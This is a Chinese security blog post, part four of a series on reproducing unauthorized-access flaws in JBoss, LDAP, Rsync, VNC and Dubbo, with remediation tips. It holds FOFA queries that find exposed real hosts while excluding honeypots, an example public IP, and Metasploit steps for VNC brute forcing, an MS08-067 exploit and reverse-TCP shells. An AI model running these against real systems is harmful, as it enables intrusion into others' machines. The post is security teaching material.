三十种未授权访问漏洞复现 合集( 四 )

已于 2024-08-04 19:50:12 修改
阅读量460 收藏 2
点赞数 11
分类专栏: 未授权访问漏洞 合集 文章标签: hadoop activemq 大数据
于 2024-08-04 19:50:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/140908482
版权

 未授权访问漏洞介绍

        未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历
        目前主要存在未授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTPGitLab, Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
        未授权访问漏洞的复现思路:
        1.使用靶场进行漏洞复现:(1)vulhub(2)本地搭建靶场
        2.使用漏洞扫描工具进行扫描(1)github-功能受限(2)Python-定制化的完成漏洞扫描的利用

目录

十六:JBoss未授权访问漏洞

十七:Ldap未授权访问漏洞

十八:Rsync未授权访问漏洞

十九:VNC未授权访问漏洞

二十:Dubbo未授权访问漏洞 


十六:JBoss未授权访问漏洞

》》》漏洞简介《《《

        JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

》》》漏洞复现《《《

fofa搜索语句:title="'Welcome to JBoss"

拼接以下路径且无需认证直接进入控制页面..

#拼接路径
http://ip:port/jmx-console/

#eg
http://177.67.128.116//jmx-console/

》》》漏洞修复建议《《《

1.jboss.deployment部署shell

2.进行JMX Console 安全配置。


十七:Ldap未授权访问漏洞

》》》漏洞简介《《《

LDAP中文全称为:轻型目录访问协议(Lightweight DirectoryAccess Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证,导致未授权访问。

》》》漏洞复现《《《

使用以下Fofa语法搜索使用Idap服务的产品.…..并通过Ldapadmin可视化工具做连接验证..

#fofa语法
port="389"

#Ldapadmin工具

http://www.ldapadmin.org/download/index.html

https://sourceforge.net/projects/ldapadmin/

启动工具并测试存在未授权的LDAP服务..成功如下.

》》》漏洞修复建议《《《

1.修改ldap的acl,不允许匿名访问。
2.根据业务设置ldap访问白名单或黑名单


十八:Rsync未授权访问漏洞

》》》漏洞简介《《《

Rsync未授权访问带来的危害主要有两个
        1.造成了严重的信息泄露;
        2.上传脚本后门文件,远程命令执行;

Rsync 是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync的默认端口为837 且默认配置文件路径在/etc/rsync.conf

# 配置文件
motd file -> motd文件位置
log file -> 日志文件位置文件位置
path-> 默认路径位置路径位置
use chroot->是否限定在该目录下定在该目录下该目录下,如果为true就限定为模块默认目录
read only->只读配置
list=true ->是否可以列出模块名以列出模块名出模块名
uid =root -> 传输使用的用户名
gid =root-> 传输使用的用户组
auth users ->认证用户名secrets file=/etc/rsyncd.passwd ->指定密码文件密码文件,密码文件/etc/rsyncd.passwd的内容格式为:username:password

hosts allow=192.168.0.101 ->设置可以允许访问的主机

hosts deny 禁止的主机*表任意任意

# 基本命令
Rsync I-avrlptgoDl I-e sshlJuser@hostIP:/dirl [/local/path]
-v 观察模式,输出更多资讯
-9与 -v 相反,仅显示错误信息
递归复制,针对目录-r
仅更新较新的文件-U
复制连接的属性
复制时保持属性不变
保存原有群组
保存原有拥有人
保存原有装置属性
保存原有时间属性
-J忽略更新时间属性,本档案比对较快
-z 加上压缩参数
-e 使用协议通道,例如ssh,-essh
-a 相对于-rlptgoD,所以-a最常用

》》》漏洞复现《《《

fofa语法:(port="873")&&(is_honeypot=false && is_fraud=false)

可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测..

#nmap命令
nmap -p873--script rsync-list-modules ipaddress


# Metasploit模块

auxiliary/scanner/rsync/modules list

》》》漏洞修复建议《《《

  1. 隐藏掉 module 信息:修改配置文件 list =false。
  2. 权限控制:不需要写入权限的 module 的设置为只读 Read only = true;
  3. 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问;
  4. 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务;
  5. 数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh;


十九:VNC未授权访问漏洞

》》》漏洞简介《《《

VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

》》》漏洞复现《《《

fofa语句:(port="5900")&&(is_honeypot=false && is_fraud=false)

可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc_none_auth

msf6 auxiliary(scanner/vnc/vnc_none_auth)>show options

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set rhosts 192.168.168.200-254

msf6 auxiliary(scanner/vnc/vnc_none_auth)>set threads 100

msf6 auxiliary(scanner/vnc/vnc_none_auth)>run


# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login)>192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set rhosts 192.168.168.228

msf6 auxiliary(scanner/vnc/vnc_login)>set blank_passwords true //弱密码爆破
msf6 auxiliary(scanner/vnc/vnc_login)>run


# 加载攻击模块
msf6 exploit(windows/smb/ms08_067_netapi)>use exploit/windows/smb/ms08_067 netapi
msf6 exploit(windows/smb/ms08_067_netapi)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi)>set rhosts 192.168.168.228

msf6 exploit(windows/smb/ms08_067_netapi)>set lhost 192.168.168.102

msf6 exploit(windows/smb/ms08_067_netapi)>set target 34

msf6 exploit(windows/smb/ms08_067_netapi)>exploit

获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6>use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp

msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

VNC链接验证...

vncviewer ipaddress

》》》漏洞修复建议《《《

  1. 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码。
  2. 以最小普通权限身份运行操作系统。

二十:Dubbo未授权访问漏洞

》》》漏洞简介《《《

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

》》》漏洞复现《《《

fofa语句:(app="APACHE-dubbo")&&(is_honeypot=false && is_fraud=false)

使用Telnet程序直接进行链接测试…

telent IP port

》》》漏洞修复建议《《《

1.配置dubbo认证。
2.设置防火墙策略;
如果正常业务中dubbo 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP 来访问服务。

A 八方
关注
  • 11
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 授权访问漏洞复现
qq_51577576的博客
09-03 1455
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
三十种授权访问漏洞复现 合集( 一 )
qq_48368964的博客
08-03 984
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。造成授权访问的根本原因就在于启动 Mongodb 的时候设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
三十种授权访问漏洞复现 合集( 二 )
最新发布
qq_48368964的博客
08-04 461
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40多种编程语言。如果管理员为Jupyter Notebook配置密码,将导致授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令,默认端口:8888。
uWSGI 授权访问 漏洞复现
Senimo
07-27 776
uWSGI 授权访问 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现漏洞POC五、参考链接 一、漏洞描述 uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言,通常被用于运行 Python WEB 应用。uWSGI除了是应用容器的名称之外,它和 Fastcgi 之类的一样,也是前端 server 与后端应用容器之间的一个交流标准。目前nginx,apache也支持 uWSGI 协议进行代理转发请求。 uWS
Jupyter Notebook 授权访问 漏洞复现
Senimo
07-23 955
Jupyter Notebook 授权访问 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现漏洞POC五、参考链接 一、漏洞描述 Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。 如果管理员为 Jupyter Notebook 配置密码,将导致授权访问漏洞,游客可在其中创建一个 console 并执行任意 Python 代码和命令。 二、漏洞影响 三、漏洞复现 1、环境搭建 使用 Vulhub 在
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 413
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1105
Redis漏洞复现
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9436
redis授权访问漏洞
InfluxDB 授权访问 漏洞复现
Senimo
07-15 4720
InfluxDB 授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现漏洞POC参考链接 一、漏洞描述 InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。 二、漏洞
Hadoop 授权访问漏洞复现
qq_68581192的博客
05-26 649
Hadoop是一个由 Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
zookeeper授权访问修复建议
07-14
ZooKeeper 授权访问修复建议 ZooKeeper 作为一个分布式应用程序协调服务,提供了高效、可靠的分布式锁、队列、节点管理等功能。但是,如果 ZooKeeper 没有正确地配置访问权限,就可能会出现授权访问的问题,...
BSPHP index.php 授权访问 信息泄露漏洞.md
04-08
BSPHP index.php 授权访问 信息泄露漏洞.md
Hadoop学习(三)
2301_79721847的博客
08-03 838
1)虚拟存储过程:将输入目录下所有文件大小,依次和设置的setMaxInputSplitSize值比较,如果不大于设置的最大值,逻辑上划分一个块。应用场景:适用于小文件过多的场景,它可以将多个小文件从逻辑上规划到一个切片(数据切片)中,多个小文件就可以交给一个MapTask处理。2)数据切片(MapReduce程序计算输入数据的单位):只是在逻辑上对输入进行分片,不在磁盘上将其切成分片进行存储。逻辑,这样增加Map端业务,减少Reduce端数据的压力,尽可能的减少数据倾斜。保证输出的每个文件内部有序。
ActiveMQ
蓝影铁哥的博客
07-22 1146
ActiveMQ
hive的内部表(MANAGED_TABLE)和外部表(EXTERNAL_TABLE)的区别
qq_58462591的博客
08-01 260
外部表:外部表的存储在hdfs中,是我们指定的文件目录,当我们删除数据或者删除分区的时候不会将元数据删除,数据还会在hdfs目录中,我们还可以进行数据挂载。内部表:内部表的存储是在hdfs的默认目录下,当我们删除数据或者删除分区的时候会将元数据删除,数据文件也会被删除。运行指令找到table_type 如果为MANAGED_TABLE,那就是内部表,内部表和外部表的主要区别在于数据的存储方式。如果是EXTERNAL_TABLE,那就是外部表。
大数据信用查询什么样的平台比较靠谱?
xiaoyikj的博客
08-01 644
随着互联网的发展和普及,大数据技术逐渐应用到各行各业中,其中之一就是信用查询领域,大数据信用查询平台能够为用户提供全面、准确的大数据信用评估,然而,由于市场上出现了许多不同的大数据信用查询平台,我们如何才能选择一个靠谱可信的平台呢?市面上很查询大数据的平台都只有一个单链接,用户查询完成之后,对报告有不清楚的地方,根本没有办法找到专人为其分析,如果一份报告自己看不懂,没有人解答,那么这次的钱就是白花了,而小易大数据平台则是市面上为数不多的提供大数据报告免费解读的平台,深受用户好评。
Java JMX 授权访问漏洞复现
06-28
JMX(Java Management Extensions)是Java平台提供的一种管理Java应用程序和组件的标准机制。然而,如果不妥善配置,JMX服务可能会存在授权访问漏洞,允许授权的用户获取敏感信息或执行操作。 复现Java JMX授权访问漏洞的一般步骤如下: 1. **环境准备**: - 确保目标系统上启用了JMX,并且有一个可远程管理的应用程序暴露了MBean(Managed Bean)。 - 需要一个支持JMX的客户端工具,如Java自带的`jconsole`或第三方工具如`jmxterm`。 2. **识别目标服务**: - 使用`jconsole`或类似工具扫描目标服务器,查看哪些MBeans正在监听并开放到网络。 3. **验证权限**: - 通常JMX默认使用`java.security.auth.login.config`文件中的用户和密码来管理访问控制。检查此配置是否允许匿名访问或者有明显的错误。 4. **尝试连接**: - 如果配置允许,可以直接使用`jconsole`、`jmxterm`等工具尝试连接,看是否能无授权访问MBean。 5. **发现漏洞**: - 如果能够无授权访问,那么说明存在授权访问漏洞,可能是因为没有正确配置访问策略,或者是默认的匿名权限设置过于宽松。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值